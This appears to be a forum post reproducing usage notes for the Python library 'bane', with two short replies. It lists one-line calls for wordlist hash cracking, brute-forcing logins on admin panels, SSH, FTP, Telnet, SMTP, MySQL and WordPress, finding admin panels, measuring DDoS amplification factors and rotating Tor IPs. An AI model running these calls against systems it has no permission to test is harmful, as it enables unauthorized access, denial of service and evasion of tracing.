Decryption:
MD5:

bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )
SHA1:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )
SHA224:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )
SHA256:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )
SHA384:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )
SHA512:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )
Base64:

bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_hash=True )
Caesar:

bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )
Bruteforcing:
Admin panel on web page:

bane.admin_brute_force(link , word_list=["admin:admin","admin:1234"] , timeout=15 )
FTP server:

bane.hydra(IP , protocol="ftp" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SSH server: (if you are on windows, please install Putty)

bane.hydra(IP , p=22 , protocol="ssh" , word_list=["admin:admin","admin:1234"] , timeout=5 )
TELNET server:

bane.hydra(IP , p=23 , protocol="telnet" , word_list=["admin:admin","admin:1234"] , timeout=5 )
SMTP server:

bane.hydra(IP , p=25 , protocol="smtp" , ehlo=False , helo=True , ttls=False , word_list=["admin:admin","admin:1234"] , timeout=5)
MySQL server:

bane.hydra(IP , p=3306 , protocol="mysqlt" , word_list=["admin:admin","admin:1234"] , timeout=5 )
WordPress login page:

bane.hydra(link , protocol="wp" , word_list=["admin:admin","admin:1234"] , timeout=15 )
Admin panel finder:

bane.admin_panel_finder(link , ext="php" , timeout=15 )
Force browsing pages on admin panel:

bane.force_browsing(link , ext="php" , timeout=15 )
Filemanager finder:

bane.filemanager_finder(link , ext="php" , timeout=15 )
Amplification factors calculation for some protocols:
DNS:

bane.dns_factor( IP , timeout=3 )
NTP:

bane.ntp_factor( IP , timeout=3 )
Memcache:

bane.memcache_factor( IP , timeout=3 )
Chargen:

bane.chargen_factor( IP , timeout=3 )
SSDP:

bane.ssdp_factor( IP , timeout=3 )
SNMP:

bane.snmp_factor( IP , timeout=3 )
ECHO:

bane.echo_factor( IP , timeout=3 )
Tor IP switching:
Without password: (doesn't work with Windows OS)

bane.tor_switch_no_password( interval=30 , logs=True )
Without password: (doesn't work with Windows OS)

bane.tor_switch_with_password( interval=30 , password=password , p=9051 , logs=True)
Updating bane:
Updating for Python2:

bane.update_py2(version=None)
Updating for Python3:

bane.update_py3(version=None)
Some extra useful functions:
Clear a file:

bane.clear_file( file )
Create a file:

bane.create_file( file )
Delete a file:

bane.delete_file( file )
Get content of a file:

bane.read_file( file )
Get CloudFlare cookie: (you must install NodeJS first)

bane.get_cf_cookie( domain , user_agent )
Get HTB invitation:

bane.HTB_invitation()
Get Facebook account's ID:

bane.facebook_id( fb_link )
Google dorking:

bane.google_dorking( dork )
Webhint report's link:

bane.webhint_report( link )
Youtube search:

bane.youtube_search( query )
Write to a file:

bane.write_file( data , file )

 

INSTALLING THE LIBRARY AND IMPORTING:

Bruh too much text right there

[12]

[font][font]mci pour ce partage [/font][/font]

[23]

[font][font]zeez[/font][/font]